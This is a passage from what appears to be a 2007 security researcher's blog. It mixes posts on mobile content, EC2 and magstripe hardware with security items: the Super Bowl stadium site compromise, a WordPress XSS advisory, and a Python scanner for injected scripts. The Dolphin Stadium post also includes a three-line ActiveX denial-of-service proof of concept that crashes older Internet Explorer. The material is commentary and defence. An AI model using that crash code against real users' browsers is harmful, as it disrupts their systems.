Social networking goes mobile
Topic: Technology
7:03 am EST, Feb 15, 2007
The technology executives and analysts here in Barcelona this week are trying to figure out how to take all the content found on the Web and migrate it to your mobile device. The mobile phone network operators like to charge for content. One executive, who didn't want to be quoted, told CNN this creates a "closed garden" of content that is controlled by your mobile operator and is dependent on what deals the operator has with a select group of content providers.

I'm pretty sure this will fail. That was the lesson of AOL. Remember all those ads that said "Go to AOL keyword [blah]"? AOL tried to be both an ISP and a rich content provider. Their product was access to a wide range of content, presumably styled and vetted by AOL for "safeness" and accuracy, all in a single easy-to-access place. This wasn't a bad deal in the mid '90s, when free websites with quality content supported by advertising didn't really exist in large numbers. And even the few sites that did exist were difficult to find because search engines sucked so much. I distinctly remember having to explain to people in 1996 that AOL was not the Internet.

So what happened? Things matured. Why spend $20 a month and go to AOL keyword "WebMD" when I can spend $10 a month and go to www.webmd.com? Why visit AOL's software library when I have download.com? Even if everyone at AOL was in the business of generating content for AOL, there were still several orders of magnitude more people generating content for the web. Suddenly there were hundreds of gates into the theme park that was the Internet, and nobody wanted to wait in line at the most expensive gate.

What about mobile phone providers? They are just gates onto a data network. They are trying to provide content their users want, and charge for it. However, they can never provide all the types of content their users want. This is a classic Long Tail issue. You are targeting mobile content at kids. But why? What about the millions of housewives? Coupons, sales, what about recipes? Take a picture of a barcode, and a website tells you meal ideas involving that item. There is definitely something there. This "mobile ISPs providing content" plan will fail as soon as one mobile provider decides to focus on leveraging the content of the entire Internet.

If companyA provided the fastest possible access to existing content, putting money into caching proxies and into software gateways that automatically reformat HTML to fit a mobile screen, they would win. Mobile providers need to embrace their role as "provider of the tubes" and make their money on charging for packets, not trying to decide what I want those packets to contain.
Wired: 27B Stroke 6 - Ajax Security at RSA
Topic: Technology
12:54 pm EST, Feb 8, 2007
The best conference presenters have a story to tell, and this morning, Billy Hoffman, the lead researcher at Web application security company SPI Dynamics, had a great story to tell Wednesday morning at the RSA security conference about how all your favorite new Web 2.0 applications are a boon to criminals.

I like Wired. I like them a lot.
Super Bowl XLI website owned
Topic: Technology
2:45 pm EST, Feb 2, 2007
Websense Security Labs has discovered that the official website of Dolphin Stadium has been compromised with malicious code. The Dolphin Stadium is currently experiencing a large number of visitors, as it is the home of Sunday's Super Bowl XLI. The site is linked from numerous official Super Bowl websites, and various Super Bowl-related search terms return links to the site. A link to a malicious JavaScript file has been inserted into the header of the front page of the site. Visitors to the site execute the script, which attempts to exploit two vulnerabilities: MS06-014 and MS07-004. Both of these exploits attempt to download and execute a malicious file.

Thanks to Jeremiah Grossman for sending me a message today bringing this to my attention. Declan McCullagh posted some good resources about this. All are plain text and will not harm you.
The original HTML page with the nasty JavaScript
Nasty JavaScript file it loads
VBScript file which gets bootstrapped from one of the HTML files
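A defender-side check for the kind of tampering Websense describes (a script reference slipped into the page header), added here as an example and not code from Websense or this post: it parses a page, resolves every script, iframe, embed and object reference, and flags any whose host is neither the page's own nor on an allowlist. The page URL, hostnames and HTML below are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Elements that pull remote content into the page, and the attribute carrying its URL.
LOADING_ATTRS = {"script": "src", "iframe": "src", "embed": "src", "object": "data"}


class RemoteRefCollector(HTMLParser):
    """Collects every remote-content reference, noting whether it sits inside <head>."""

    def __init__(self):
        super().__init__()
        self.in_head = False
        self.refs = []  # (tag, raw url, in_head)

    def handle_starttag(self, tag, attrs):
        if tag == "head":
            self.in_head = True
        attr = LOADING_ATTRS.get(tag)
        if attr:
            value = dict(attrs).get(attr)
            if value:
                self.refs.append((tag, value.strip(), self.in_head))

    def handle_endtag(self, tag):
        if tag == "head":
            self.in_head = False


def unexpected_refs(html, page_url, allowed_hosts):
    """Return references whose host is not the page's own host and not on the allowlist."""
    parser = RemoteRefCollector()
    parser.feed(html)
    allowed = {h.lower() for h in allowed_hosts} | {urlsplit(page_url).hostname}
    findings = []
    for tag, raw, in_head in parser.refs:
        # urljoin resolves relative paths and protocol-relative (//host/...) references;
        # a javascript: or data: source has no host and is flagged as well.
        host = urlsplit(urljoin(page_url, raw)).hostname
        if host is None or host.lower() not in allowed:
            findings.append({"tag": tag, "url": raw, "host": host, "in_head": in_head})
    return findings


# Constructed sample: one legitimate CDN reference plus two injected ones.
SAMPLE_HTML = """<html><head><title>Stadium</title>
<script src="/js/menu.js"></script>
<script src="//cdn.allowed.example/lib.js"></script>
<script src="http://injected.example.invalid/w.js"></script>
</head><body><p>Welcome</p>
<iframe src="http://injected.example.invalid/f.html" width=0 height=0></iframe>
</body></html>"""


def scan_sample():
    return unexpected_refs(SAMPLE_HTML, "http://www.stadium.example/", ["cdn.allowed.example"])
```

Run it against a periodic fetch of your own front page and alert on any non-empty result; the in_head flag tells you whether the reference runs before the page body is even rendered.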
Wordpress Template.PHP HTML Injection Vulnerability
Topic: Technology
12:44 am EST, Feb 2, 2007
Wordpress is prone to an HTML-injection scripting vulnerability because the application fails to properly sanitize user-supplied input. Versions prior to 2.0.6 are vulnerable to this issue.
Beware, all you MemeStreams WordPressians: you have an XSS vuln.

Topic: Technology
1:25 pm EST, Feb 1, 2007
Why oh why does Firefox send an HTTP request when I click "View Source"? I already have the source! It's being rendered! It's in the cache! Why the hell are you fetching it again? This is especially nasty when looking at the source for the response to an HTTP POST. That's it. Firefox is going on my "punch in the face" list.

GNUCITIZEN - JavaScript Remoting Dangers
Topic: Technology
11:49 am EST, Jan 31, 2007
For those unfamiliar, GNUCITIZEN is quite possibly the best site on the internet for web security research that is not affiliated with a vendor. pdp has covered topics such as backdooring Quicktime files, building XSS attack libraries, improving existing port scanners and history stealers, and even a JavaScript web crawler (which is currently receiving a massive improvement...). Much of his work ends up appearing in live attacks a few months after the info is released. Needless to say, I was really happy when pdp asked me to write a blog entry for his site. I wrote up a meaty overview of the different methods JavaScript can use to send HTTP requests, as well as the pros and cons of each.

MT-85
Topic: Technology
11:23 am EST, Jan 31, 2007
The MT-85 is a LoCo manual swipe magstripe encoder-reader that allows financial cards, ID badges, or passbooks to be instantly encoded and issued to customers. Its compact footprint and rugged design make it an ideal choice for magstripe card, badge, or passbook issuance at financial institutions, schools, businesses, and government environments. An RS-232 interface and simplified command set allow for quick integration with software applications. An LED provides clear status indications to the operator. Available in either Track-2 only, or Track 1, 2, 3 configurations, the MT-85 encodes and read-verifies magnetic data per the ISO 7810 low-coercivity magstripe standards.
These guys give C code driver examples. They ROCK. This is a good reason to start working on StripeSnoop some more. I haven't touched the project since I graduated from GaTech in spring of 2005, but there is still a fair bit of interest in it. Elliot over at Hack a Day tells me it's one of the best magstripe suites out there and people love it.

Amazon - EC2
Topic: Technology
2:36 pm EST, Jan 29, 2007
The Amazon Elastic Compute Cloud (Amazon EC2) web service provides you with the ability to execute your applications in Amazon's computing environment. To use Amazon EC2 you simply:
1. Create an Amazon Machine Image (AMI) containing all your software, including your operating system and associated configuration settings, applications, libraries, etc. Think of this as zipping up the contents of your hard drive. We provide all the necessary tools to create and package your AMI.
2. Upload this AMI to the Amazon S3 (Amazon Simple Storage Service) service. This gives us reliable, secure access to your AMI.
3. Register your AMI with Amazon EC2. This allows us to verify that your AMI has been uploaded correctly and to allocate a unique identifier for it.
4. Use this AMI ID and the Amazon EC2 web service APIs to run, monitor, and terminate as many instances of this AMI as required. Currently, we provide command line tools and Java libraries, and you may also directly access our SOAP or Query based APIs.

Think Sun's Grid computing, only cheaper, with virtualized machine images. I've got an immense project needing lots of CPU power and RAM, but it should only last a few weeks if I do it right. This might be the ticket.

ActiveX DoS in all IE < 7
Topic: Technology
10:54 am EST, Jan 29, 2007
Ok, DoS against a browser isn't too interesting, but look at the code:
<script language="JavaScript">
obj = new ActiveXObject("giffile");
obj.bgColor;
</script>
That's it!?! How did someone miss that! A simple programming mistake would have caused this!

Topic: Technology
8:18 pm EST, Jan 28, 2007
Title: A Hacker's approach to Web Applications

Abstract: This talk will be a live demonstration of how a hacker discovers, analyzes, attacks, and exploits a web application. I will have several sites running on test machines that we will attack. Specific topics include performing reconnaissance, detecting and fingerprinting backend systems, and how to properly utilize different attack vectors like XSS, XSRF, and SQL Injection to do maximum damage to the site. I'll poke holes in common web security myths and I'll also discuss my experiences with pen testing real world sites. Finally, I'll show how to properly secure a website against evil people.

Bio: Acidus spends his days trying to destroy the Intarweb as the lead R&D engineer at a major web security firm. He is far too curious for his own good, and likes really girlie drinks. You know, the kind that come in funny glasses with lots of fruit in them. Seriously, someone buy him a dark beer and some testicles.